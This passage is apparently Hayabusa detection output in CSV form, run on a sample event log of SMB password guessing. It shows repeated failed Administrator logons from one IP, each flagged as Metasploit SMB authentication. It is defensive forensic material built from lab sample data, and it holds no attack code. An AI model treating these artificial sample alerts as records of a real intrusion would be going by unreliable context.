Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 